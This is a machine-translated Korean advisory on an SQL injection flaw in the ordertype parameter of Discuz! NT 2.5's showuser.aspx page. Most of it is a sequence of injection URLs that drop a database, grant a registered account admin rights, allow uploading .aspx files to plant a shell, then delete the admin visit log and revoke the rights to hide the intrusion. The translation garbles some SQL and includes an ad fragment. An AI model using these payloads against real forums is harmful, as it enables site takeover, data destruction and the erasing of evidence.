속보 discuz! NT 2.5 주요 취약점

중간 트랜잭션 http://www.aliyun.com/zixun/aggregation/6858.html "> seo 진단 Taobao 게스트 클라우드 호스트 기술 홀

취약점 설명: discuz! NT 2.5는 Kangsheng (베이징)의 ASP.net 플랫폼 기반의 강력한 커뮤니티 소프트웨어 기술 유한 회사 고급 기준. 닷넷 프레임 워크, 기본 지원 SQL Server 데이터베이스, 확장 지원 액세스, MySQL과 다른 데이터베이스 지원 IIS5, IIS6, IIS7, 안전 하 고 효율적, 안정적이 고 사용 하기 쉬운 게 asp.net 특성을 발휘 피부를 전환 하 여 다양 한 다른 포럼에서에서 데이터 변환을 지원 무료 선택 지원.

discuz! NT 2.5 포럼 기능을 강화, 향상 된 속도 안정성, 부하 능력 또한 놀라운 개선,이 재단에도 제공할 것입니다, 상품 거래, 공간, 사진 앨범을 포함 한 강력한 기능 패키지 사용자 무료 선택 설치 매니페스트에 대 한 강력한 확장 확장성. 기능, 성능에서 또는 환경 지원, 현재 가장 정교 하 고 성숙 asp.net 커뮤니티 소프트웨어가 있습니다. 그러나, Isto 구성원 성공적인 악용 전체 사이트 제어 관리자 권한의 얻을을 배경으로 관리자의 암호를 직접 수정 하 사용 될 수 있는 보안 취약점을 발견.

취약점 제조 업체: http://www.comsenz.com

취약점 확인: discuz! OrderType 변수 때문에 Showuser.aspx 페이지의 NT 2.5 (Pre-20080826 업데이트) 버전 잘 처리 되지! 하면 SQL 주입, 사용자도 악의적인 공격 등록 계정으로 신중 하 게 생성 된 ordertype이이 취약점을 악용할 수 있습니다.

취약점 테스트:

Http://www.*.com/bbs/showuser.aspx?ordertype=desc;drop 데이터베이스 kj;-

Http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_users adminid 설정 = ' 1 ', 그룹 id = ' 1′where 사용자 이름 = ' Webtets ';-관리자 //update

Http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_attachtypes 설정 확장 어디 'aspx' = 확장 = 'jpg' -업로드 aspx //update

쉘 후...

Http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_attachtypes 설정 확장 어디 'jpg' = 확장 = 'aspx' -다시 JPG로 //update

Dnt_adminvisitlog에서 Http://www.*.com/bbs/showuser.aspx?ordertype=desc;delete 어디 사용자 이름 = 'webtets';-//Delete 로그

Http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_users Set adminid = ", 그룹 id =" 어디 사용자 이름 = 'webtets' -//Cancel 관리자